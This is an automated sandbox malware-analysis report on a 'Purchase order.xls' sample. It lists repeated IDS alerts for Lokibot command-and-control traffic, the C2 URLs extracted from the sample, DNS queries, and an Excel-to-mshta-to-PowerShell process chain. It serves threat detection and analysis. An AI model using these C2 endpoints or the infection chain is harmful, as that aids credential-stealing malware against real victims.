                2024-10-25T19:52:04.043801+020020253811Malware Command and Control Activity Detected192.168.2.224918794.156.177.22080TCP
                2024-10-25T19:52:05.183331+020020253811Malware Command and Control Activity Detected192.168.2.224918894.156.177.22080TCP
                2024-10-25T19:52:06.351136+020020253811Malware Command and Control Activity Detected192.168.2.224918994.156.177.22080TCP
                2024-10-25T19:52:07.823914+020020253811Malware Command and Control Activity Detected192.168.2.224919094.156.177.22080TCP
                2024-10-25T19:52:08.973694+020020253811Malware Command and Control Activity Detected192.168.2.224919194.156.177.22080TCP
                2024-10-25T19:52:10.380036+020020253811Malware Command and Control Activity Detected192.168.2.224919294.156.177.22080TCP
                2024-10-25T19:52:12.508412+020020253811Malware Command and Control Activity Detected192.168.2.224919394.156.177.22080TCP
                2024-10-25T19:52:13.973613+020020253811Malware Command and Control Activity Detected192.168.2.224919494.156.177.22080TCP
                2024-10-25T19:52:15.125319+020020253811Malware Command and Control Activity Detected192.168.2.224919594.156.177.22080TCP
                2024-10-25T19:52:16.242299+020020253811Malware Command and Control Activity Detected192.168.2.224919694.156.177.22080TCP
                2024-10-25T19:52:17.452452+020020253811Malware Command and Control Activity Detected192.168.2.224919794.156.177.22080TCP
                2024-10-25T19:52:18.588953+020020253811Malware Command and Control Activity Detected192.168.2.224919894.156.177.22080TCP
                2024-10-25T19:52:19.696573+020020253811Malware Command and Control Activity Detected192.168.2.224919994.156.177.22080TCP
                2024-10-25T19:52:20.864617+020020253811Malware Command and Control Activity Detected192.168.2.224920094.156.177.22080TCP
                2024-10-25T19:52:21.996703+020020253811Malware Command and Control Activity Detected192.168.2.224920194.156.177.22080TCP
                2024-10-25T19:52:23.143979+020020253811Malware Command and Control Activity Detected192.168.2.224920294.156.177.22080TCP
                2024-10-25T19:52:24.540108+020020253811Malware Command and Control Activity Detected192.168.2.224920394.156.177.22080TCP
                2024-10-25T19:52:25.739974+020020253811Malware Command and Control Activity Detected192.168.2.224920494.156.177.22080TCP
                2024-10-25T19:52:26.830845+020020253811Malware Command and Control Activity Detected192.168.2.224920594.156.177.22080TCP
                2024-10-25T19:52:27.960200+020020253811Malware Command and Control Activity Detected192.168.2.224920694.156.177.22080TCP
                2024-10-25T19:52:29.089465+020020253811Malware Command and Control Activity Detected192.168.2.224920794.156.177.22080TCP
                2024-10-25T19:52:30.239136+020020253811Malware Command and Control Activity Detected192.168.2.224920894.156.177.22080TCP
                2024-10-25T19:52:31.348968+020020253811Malware Command and Control Activity Detected192.168.2.224920994.156.177.22080TCP
                2024-10-25T19:52:32.440484+020020253811Malware Command and Control Activity Detected192.168.2.224921094.156.177.22080TCP
                2024-10-25T19:52:33.550208+020020253811Malware Command and Control Activity Detected192.168.2.224921194.156.177.22080TCP
                2024-10-25T19:52:34.679063+020020253811Malware Command and Control Activity Detected192.168.2.224921294.156.177.22080TCP
                2024-10-25T19:52:36.585142+020020253811Malware Command and Control Activity Detected192.168.2.224921394.156.177.22080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-25T19:51:53.654785+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249178TCP
                2024-10-25T19:51:55.136764+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249179TCP
                2024-10-25T19:51:56.315085+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249180TCP
                2024-10-25T19:51:57.420554+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249181TCP
                2024-10-25T19:51:58.528171+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249182TCP
                2024-10-25T19:52:00.226865+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249183TCP
                2024-10-25T19:52:01.352272+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249184TCP
                2024-10-25T19:52:02.491875+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249185TCP
                2024-10-25T19:52:03.896823+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249186TCP
                2024-10-25T19:52:05.014452+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249187TCP
                2024-10-25T19:52:06.190968+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249188TCP
                2024-10-25T19:52:07.664910+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249189TCP
                2024-10-25T19:52:08.800242+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249190TCP
                2024-10-25T19:52:10.031535+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249191TCP
                2024-10-25T19:52:11.356894+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249192TCP
                2024-10-25T19:52:13.462575+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249193TCP
                2024-10-25T19:52:14.956948+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249194TCP
                2024-10-25T19:52:16.087518+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249195TCP
                2024-10-25T19:52:17.330751+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249196TCP
                2024-10-25T19:52:18.444630+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249197TCP
                2024-10-25T19:52:19.560466+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249198TCP
                2024-10-25T19:52:20.735097+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249199TCP
                2024-10-25T19:52:21.842413+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249200TCP
                2024-10-25T19:52:22.959303+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249201TCP
                2024-10-25T19:52:24.370764+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249202TCP
                2024-10-25T19:52:25.516183+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249203TCP
                2024-10-25T19:52:26.672545+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249204TCP
                2024-10-25T19:52:27.808891+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249205TCP
                2024-10-25T19:52:28.951444+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249206TCP
                2024-10-25T19:52:30.093255+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249207TCP
                2024-10-25T19:52:31.205724+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249208TCP
                2024-10-25T19:52:32.298660+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249209TCP
                2024-10-25T19:52:33.410305+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249210TCP
                2024-10-25T19:52:34.524336+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249211TCP
                2024-10-25T19:52:35.664690+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249212TCP
                2024-10-25T19:52:37.684229+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249213TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-25T19:51:53.648713+020020243131Malware Command and Control Activity Detected192.168.2.224917894.156.177.22080TCP
                2024-10-25T19:51:55.136616+020020243131Malware Command and Control Activity Detected192.168.2.224917994.156.177.22080TCP
                2024-10-25T19:51:56.284539+020020243131Malware Command and Control Activity Detected192.168.2.224918094.156.177.22080TCP
                2024-10-25T19:51:57.409276+020020243131Malware Command and Control Activity Detected192.168.2.224918194.156.177.22080TCP
                2024-10-25T19:51:58.522256+020020243131Malware Command and Control Activity Detected192.168.2.224918294.156.177.22080TCP
                2024-10-25T19:52:00.220924+020020243131Malware Command and Control Activity Detected192.168.2.224918394.156.177.22080TCP
                2024-10-25T19:52:01.346125+020020243131Malware Command and Control Activity Detected192.168.2.224918494.156.177.22080TCP
                2024-10-25T19:52:02.484796+020020243131Malware Command and Control Activity Detected192.168.2.224918594.156.177.22080TCP
                2024-10-25T19:52:03.891131+020020243131Malware Command and Control Activity Detected192.168.2.224918694.156.177.22080TCP
                2024-10-25T19:52:05.006829+020020243131Malware Command and Control Activity Detected192.168.2.224918794.156.177.22080TCP
                2024-10-25T19:52:06.185045+020020243131Malware Command and Control Activity Detected192.168.2.224918894.156.177.22080TCP
                2024-10-25T19:52:07.664194+020020243131Malware Command and Control Activity Detected192.168.2.224918994.156.177.22080TCP
                2024-10-25T19:52:08.794009+020020243131Malware Command and Control Activity Detected192.168.2.224919094.156.177.22080TCP
                2024-10-25T19:52:10.025133+020020243131Malware Command and Control Activity Detected192.168.2.224919194.156.177.22080TCP
                2024-10-25T19:52:11.347349+020020243131Malware Command and Control Activity Detected192.168.2.224919294.156.177.22080TCP
                2024-10-25T19:52:13.456769+020020243131Malware Command and Control Activity Detected192.168.2.224919394.156.177.22080TCP
                2024-10-25T19:52:14.951162+020020243131Malware Command and Control Activity Detected192.168.2.224919494.156.177.22080TCP
                2024-10-25T19:52:16.081321+020020243131Malware Command and Control Activity Detected192.168.2.224919594.156.177.22080TCP
                2024-10-25T19:52:17.297037+020020243131Malware Command and Control Activity Detected192.168.2.224919694.156.177.22080TCP
                2024-10-25T19:52:18.438249+020020243131Malware Command and Control Activity Detected192.168.2.224919794.156.177.22080TCP
                2024-10-25T19:52:19.554707+020020243131Malware Command and Control Activity Detected192.168.2.224919894.156.177.22080TCP
                2024-10-25T19:52:20.719023+020020243131Malware Command and Control Activity Detected192.168.2.224919994.156.177.22080TCP
                2024-10-25T19:52:21.835784+020020243131Malware Command and Control Activity Detected192.168.2.224920094.156.177.22080TCP
                2024-10-25T19:52:22.953058+020020243131Malware Command and Control Activity Detected192.168.2.224920194.156.177.22080TCP
                2024-10-25T19:52:24.369508+020020243131Malware Command and Control Activity Detected192.168.2.224920294.156.177.22080TCP
                2024-10-25T19:52:25.510015+020020243131Malware Command and Control Activity Detected192.168.2.224920394.156.177.22080TCP
                2024-10-25T19:52:26.666693+020020243131Malware Command and Control Activity Detected192.168.2.224920494.156.177.22080TCP
                2024-10-25T19:52:27.802867+020020243131Malware Command and Control Activity Detected192.168.2.224920594.156.177.22080TCP
                2024-10-25T19:52:28.944599+020020243131Malware Command and Control Activity Detected192.168.2.224920694.156.177.22080TCP
                2024-10-25T19:52:30.087566+020020243131Malware Command and Control Activity Detected192.168.2.224920794.156.177.22080TCP
                2024-10-25T19:52:31.199980+020020243131Malware Command and Control Activity Detected192.168.2.224920894.156.177.22080TCP
                2024-10-25T19:52:32.292784+020020243131Malware Command and Control Activity Detected192.168.2.224920994.156.177.22080TCP
                2024-10-25T19:52:33.404037+020020243131Malware Command and Control Activity Detected192.168.2.224921094.156.177.22080TCP
                2024-10-25T19:52:34.518597+020020243131Malware Command and Control Activity Detected192.168.2.224921194.156.177.22080TCP
                2024-10-25T19:52:35.658929+020020243131Malware Command and Control Activity Detected192.168.2.224921294.156.177.22080TCP
                2024-10-25T19:52:37.678244+020020243131Malware Command and Control Activity Detected192.168.2.224921394.156.177.22080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-25T19:51:53.648713+020020243181Malware Command and Control Activity Detected192.168.2.224917894.156.177.22080TCP
                2024-10-25T19:51:55.136616+020020243181Malware Command and Control Activity Detected192.168.2.224917994.156.177.22080TCP
                2024-10-25T19:51:56.284539+020020243181Malware Command and Control Activity Detected192.168.2.224918094.156.177.22080TCP
                2024-10-25T19:51:57.409276+020020243181Malware Command and Control Activity Detected192.168.2.224918194.156.177.22080TCP
                2024-10-25T19:51:58.522256+020020243181Malware Command and Control Activity Detected192.168.2.224918294.156.177.22080TCP
                2024-10-25T19:52:00.220924+020020243181Malware Command and Control Activity Detected192.168.2.224918394.156.177.22080TCP
                2024-10-25T19:52:01.346125+020020243181Malware Command and Control Activity Detected192.168.2.224918494.156.177.22080TCP
                2024-10-25T19:52:02.484796+020020243181Malware Command and Control Activity Detected192.168.2.224918594.156.177.22080TCP
                2024-10-25T19:52:03.891131+020020243181Malware Command and Control Activity Detected192.168.2.224918694.156.177.22080TCP
                2024-10-25T19:52:05.006829+020020243181Malware Command and Control Activity Detected192.168.2.224918794.156.177.22080TCP
                2024-10-25T19:52:06.185045+020020243181Malware Command and Control Activity Detected192.168.2.224918894.156.177.22080TCP
                2024-10-25T19:52:07.664194+020020243181Malware Command and Control Activity Detected192.168.2.224918994.156.177.22080TCP
                2024-10-25T19:52:08.794009+020020243181Malware Command and Control Activity Detected192.168.2.224919094.156.177.22080TCP
                2024-10-25T19:52:10.025133+020020243181Malware Command and Control Activity Detected192.168.2.224919194.156.177.22080TCP
                2024-10-25T19:52:11.347349+020020243181Malware Command and Control Activity Detected192.168.2.224919294.156.177.22080TCP
                2024-10-25T19:52:13.456769+020020243181Malware Command and Control Activity Detected192.168.2.224919394.156.177.22080TCP
                2024-10-25T19:52:14.951162+020020243181Malware Command and Control Activity Detected192.168.2.224919494.156.177.22080TCP
                2024-10-25T19:52:16.081321+020020243181Malware Command and Control Activity Detected192.168.2.224919594.156.177.22080TCP
                2024-10-25T19:52:17.297037+020020243181Malware Command and Control Activity Detected192.168.2.224919694.156.177.22080TCP
                2024-10-25T19:52:18.438249+020020243181Malware Command and Control Activity Detected192.168.2.224919794.156.177.22080TCP
                2024-10-25T19:52:19.554707+020020243181Malware Command and Control Activity Detected192.168.2.224919894.156.177.22080TCP
                2024-10-25T19:52:20.719023+020020243181Malware Command and Control Activity Detected192.168.2.224919994.156.177.22080TCP
                2024-10-25T19:52:21.835784+020020243181Malware Command and Control Activity Detected192.168.2.224920094.156.177.22080TCP
                2024-10-25T19:52:22.953058+020020243181Malware Command and Control Activity Detected192.168.2.224920194.156.177.22080TCP
                2024-10-25T19:52:24.369508+020020243181Malware Command and Control Activity Detected192.168.2.224920294.156.177.22080TCP
                2024-10-25T19:52:25.510015+020020243181Malware Command and Control Activity Detected192.168.2.224920394.156.177.22080TCP
                2024-10-25T19:52:26.666693+020020243181Malware Command and Control Activity Detected192.168.2.224920494.156.177.22080TCP
                2024-10-25T19:52:27.802867+020020243181Malware Command and Control Activity Detected192.168.2.224920594.156.177.22080TCP
                2024-10-25T19:52:28.944599+020020243181Malware Command and Control Activity Detected192.168.2.224920694.156.177.22080TCP
                2024-10-25T19:52:30.087566+020020243181Malware Command and Control Activity Detected192.168.2.224920794.156.177.22080TCP
                2024-10-25T19:52:31.199980+020020243181Malware Command and Control Activity Detected192.168.2.224920894.156.177.22080TCP
                2024-10-25T19:52:32.292784+020020243181Malware Command and Control Activity Detected192.168.2.224920994.156.177.22080TCP
                2024-10-25T19:52:33.404037+020020243181Malware Command and Control Activity Detected192.168.2.224921094.156.177.22080TCP
                2024-10-25T19:52:34.518597+020020243181Malware Command and Control Activity Detected192.168.2.224921194.156.177.22080TCP
                2024-10-25T19:52:35.658929+020020243181Malware Command and Control Activity Detected192.168.2.224921294.156.177.22080TCP
                2024-10-25T19:52:37.678244+020020243181Malware Command and Control Activity Detected192.168.2.224921394.156.177.22080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-25T19:51:50.145221+020020216411A Network Trojan was detected192.168.2.224917694.156.177.22080TCP
                2024-10-25T19:51:51.616427+020020216411A Network Trojan was detected192.168.2.224917794.156.177.22080TCP
                2024-10-25T19:51:52.671652+020020216411A Network Trojan was detected192.168.2.224917894.156.177.22080TCP
                2024-10-25T19:51:53.908424+020020216411A Network Trojan was detected192.168.2.224917994.156.177.22080TCP
                2024-10-25T19:51:55.330639+020020216411A Network Trojan was detected192.168.2.224918094.156.177.22080TCP
                2024-10-25T19:51:56.433699+020020216411A Network Trojan was detected192.168.2.224918194.156.177.22080TCP
                2024-10-25T19:51:57.559759+020020216411A Network Trojan was detected192.168.2.224918294.156.177.22080TCP
                2024-10-25T19:51:59.256821+020020216411A Network Trojan was detected192.168.2.224918394.156.177.22080TCP
                2024-10-25T19:52:00.374097+020020216411A Network Trojan was detected192.168.2.224918494.156.177.22080TCP
                2024-10-25T19:52:01.495590+020020216411A Network Trojan was detected192.168.2.224918594.156.177.22080TCP
                2024-10-25T19:52:02.924655+020020216411A Network Trojan was detected192.168.2.224918694.156.177.22080TCP
                2024-10-25T19:52:04.043801+020020216411A Network Trojan was detected192.168.2.224918794.156.177.22080TCP
                2024-10-25T19:52:05.183331+020020216411A Network Trojan was detected192.168.2.224918894.156.177.22080TCP
                2024-10-25T19:52:06.351136+020020216411A Network Trojan was detected192.168.2.224918994.156.177.22080TCP
                2024-10-25T19:52:07.823914+020020216411A Network Trojan was detected192.168.2.224919094.156.177.22080TCP
                2024-10-25T19:52:08.973694+020020216411A Network Trojan was detected192.168.2.224919194.156.177.22080TCP
                2024-10-25T19:52:10.380036+020020216411A Network Trojan was detected192.168.2.224919294.156.177.22080TCP
                2024-10-25T19:52:12.508412+020020216411A Network Trojan was detected192.168.2.224919394.156.177.22080TCP
                2024-10-25T19:52:13.973613+020020216411A Network Trojan was detected192.168.2.224919494.156.177.22080TCP
                2024-10-25T19:52:15.125319+020020216411A Network Trojan was detected192.168.2.224919594.156.177.22080TCP
                2024-10-25T19:52:16.242299+020020216411A Network Trojan was detected192.168.2.224919694.156.177.22080TCP
                2024-10-25T19:52:17.452452+020020216411A Network Trojan was detected192.168.2.224919794.156.177.22080TCP
                2024-10-25T19:52:18.588953+020020216411A Network Trojan was detected192.168.2.224919894.156.177.22080TCP
                2024-10-25T19:52:19.696573+020020216411A Network Trojan was detected192.168.2.224919994.156.177.22080TCP
                2024-10-25T19:52:20.864617+020020216411A Network Trojan was detected192.168.2.224920094.156.177.22080TCP
                2024-10-25T19:52:21.996703+020020216411A Network Trojan was detected192.168.2.224920194.156.177.22080TCP
                2024-10-25T19:52:23.143979+020020216411A Network Trojan was detected192.168.2.224920294.156.177.22080TCP
                2024-10-25T19:52:24.540108+020020216411A Network Trojan was detected192.168.2.224920394.156.177.22080TCP
                2024-10-25T19:52:25.739974+020020216411A Network Trojan was detected192.168.2.224920494.156.177.22080TCP
                2024-10-25T19:52:26.830845+020020216411A Network Trojan was detected192.168.2.224920594.156.177.22080TCP
                2024-10-25T19:52:27.960200+020020216411A Network Trojan was detected192.168.2.224920694.156.177.22080TCP
                2024-10-25T19:52:29.089465+020020216411A Network Trojan was detected192.168.2.224920794.156.177.22080TCP
                2024-10-25T19:52:30.239136+020020216411A Network Trojan was detected192.168.2.224920894.156.177.22080TCP
                2024-10-25T19:52:31.348968+020020216411A Network Trojan was detected192.168.2.224920994.156.177.22080TCP
                2024-10-25T19:52:32.440484+020020216411A Network Trojan was detected192.168.2.224921094.156.177.22080TCP
                2024-10-25T19:52:33.550208+020020216411A Network Trojan was detected192.168.2.224921194.156.177.22080TCP
                2024-10-25T19:52:34.679063+020020216411A Network Trojan was detected192.168.2.224921294.156.177.22080TCP
                2024-10-25T19:52:36.585142+020020216411A Network Trojan was detected192.168.2.224921394.156.177.22080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-25T19:51:33.195456+020020490381A Network Trojan was detected142.250.186.161443192.168.2.2249174TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-25T19:51:50.145221+020028257661Malware Command and Control Activity Detected192.168.2.224917694.156.177.22080TCP
                2024-10-25T19:51:51.616427+020028257661Malware Command and Control Activity Detected192.168.2.224917794.156.177.22080TCP
                2024-10-25T19:51:52.671652+020028257661Malware Command and Control Activity Detected192.168.2.224917894.156.177.22080TCP
                2024-10-25T19:51:53.908424+020028257661Malware Command and Control Activity Detected192.168.2.224917994.156.177.22080TCP
                2024-10-25T19:51:55.330639+020028257661Malware Command and Control Activity Detected192.168.2.224918094.156.177.22080TCP
                2024-10-25T19:51:56.433699+020028257661Malware Command and Control Activity Detected192.168.2.224918194.156.177.22080TCP
                2024-10-25T19:51:57.559759+020028257661Malware Command and Control Activity Detected192.168.2.224918294.156.177.22080TCP
                2024-10-25T19:51:59.256821+020028257661Malware Command and Control Activity Detected192.168.2.224918394.156.177.22080TCP
                2024-10-25T19:52:00.374097+020028257661Malware Command and Control Activity Detected192.168.2.224918494.156.177.22080TCP
                2024-10-25T19:52:01.495590+020028257661Malware Command and Control Activity Detected192.168.2.224918594.156.177.22080TCP
                2024-10-25T19:52:02.924655+020028257661Malware Command and Control Activity Detected192.168.2.224918694.156.177.22080TCP
                2024-10-25T19:52:04.043801+020028257661Malware Command and Control Activity Detected192.168.2.224918794.156.177.22080TCP
                2024-10-25T19:52:05.183331+020028257661Malware Command and Control Activity Detected192.168.2.224918894.156.177.22080TCP
                2024-10-25T19:52:06.351136+020028257661Malware Command and Control Activity Detected192.168.2.224918994.156.177.22080TCP
                2024-10-25T19:52:07.823914+020028257661Malware Command and Control Activity Detected192.168.2.224919094.156.177.22080TCP
                2024-10-25T19:52:08.973694+020028257661Malware Command and Control Activity Detected192.168.2.224919194.156.177.22080TCP
                2024-10-25T19:52:10.380036+020028257661Malware Command and Control Activity Detected192.168.2.224919294.156.177.22080TCP
                2024-10-25T19:52:12.508412+020028257661Malware Command and Control Activity Detected192.168.2.224919394.156.177.22080TCP
                2024-10-25T19:52:13.973613+020028257661Malware Command and Control Activity Detected192.168.2.224919494.156.177.22080TCP
                2024-10-25T19:52:15.125319+020028257661Malware Command and Control Activity Detected192.168.2.224919594.156.177.22080TCP
                2024-10-25T19:52:16.242299+020028257661Malware Command and Control Activity Detected192.168.2.224919694.156.177.22080TCP
                2024-10-25T19:52:17.452452+020028257661Malware Command and Control Activity Detected192.168.2.224919794.156.177.22080TCP
                2024-10-25T19:52:18.588953+020028257661Malware Command and Control Activity Detected192.168.2.224919894.156.177.22080TCP
                2024-10-25T19:52:19.696573+020028257661Malware Command and Control Activity Detected192.168.2.224919994.156.177.22080TCP
                2024-10-25T19:52:20.864617+020028257661Malware Command and Control Activity Detected192.168.2.224920094.156.177.22080TCP
                2024-10-25T19:52:21.996703+020028257661Malware Command and Control Activity Detected192.168.2.224920194.156.177.22080TCP
                2024-10-25T19:52:23.143979+020028257661Malware Command and Control Activity Detected192.168.2.224920294.156.177.22080TCP
                2024-10-25T19:52:24.540108+020028257661Malware Command and Control Activity Detected192.168.2.224920394.156.177.22080TCP
                2024-10-25T19:52:25.739974+020028257661Malware Command and Control Activity Detected192.168.2.224920494.156.177.22080TCP
                2024-10-25T19:52:26.830845+020028257661Malware Command and Control Activity Detected192.168.2.224920594.156.177.22080TCP
                2024-10-25T19:52:27.960200+020028257661Malware Command and Control Activity Detected192.168.2.224920694.156.177.22080TCP
                2024-10-25T19:52:29.089465+020028257661Malware Command and Control Activity Detected192.168.2.224920794.156.177.22080TCP
                2024-10-25T19:52:30.239136+020028257661Malware Command and Control Activity Detected192.168.2.224920894.156.177.22080TCP
                2024-10-25T19:52:31.348968+020028257661Malware Command and Control Activity Detected192.168.2.224920994.156.177.22080TCP
                2024-10-25T19:52:32.440484+020028257661Malware Command and Control Activity Detected192.168.2.224921094.156.177.22080TCP
                2024-10-25T19:52:33.550208+020028257661Malware Command and Control Activity Detected192.168.2.224921194.156.177.22080TCP
                2024-10-25T19:52:34.679063+020028257661Malware Command and Control Activity Detected192.168.2.224921294.156.177.22080TCP
                2024-10-25T19:52:36.585142+020028257661Malware Command and Control Activity Detected192.168.2.224921394.156.177.22080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-25T19:50:44.185312+020028582951A Network Trojan was detected192.3.176.14180192.168.2.2249175TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-25T19:51:09.880866+020028587951A Network Trojan was detected192.168.2.2249170192.3.176.14180TCP
                2024-10-25T19:51:14.806501+020028587951A Network Trojan was detected192.168.2.2249172192.3.176.14180TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 26.2.aspnet_regbrowsers.exe.400000.0.unpackMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.220/simple/five/fre.php"]}
                Source: Purchase order.xlsReversingLabs: Detection: 15%
                Source: Purchase order.xlsJoe Sandbox ML: detected
                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.22:49173 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.22:49174 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49165 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49169 version: TLS 1.2
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.pdb source: powershell.exe, 0000000C.00000002.498611259.000000000250E000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.pdbhP source: powershell.exe, 0000000C.00000002.498611259.000000000287C000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: aspnet_regbrowsers.pdb source: aspnet_regbrowsers.exe, aspnet_regbrowsers.exe, 0000001A.00000002.666825665.0000000001272000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: aspnet_regbrowsers.pdbl source: aspnet_regbrowsers.exe, 0000001A.00000002.666825665.0000000001272000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.pdb source: powershell.exe, 00000005.00000002.511869443.0000000002282000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.pdbhP source: powershell.exe, 00000005.00000002.511869443.0000000002282000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 26_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,26_2_00403D74

                Software Vulnerabilities

                barindex
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: global trafficDNS query: name: qrisni.me
                Source: global trafficDNS query: name: qrisni.me
                Source: global trafficDNS query: name: qrisni.me
                Source: global trafficDNS query: name: qrisni.me
                Source: global trafficDNS query: name: drive.google.com
                Source: global trafficDNS query: name: drive.usercontent.google.com
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.186.46:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
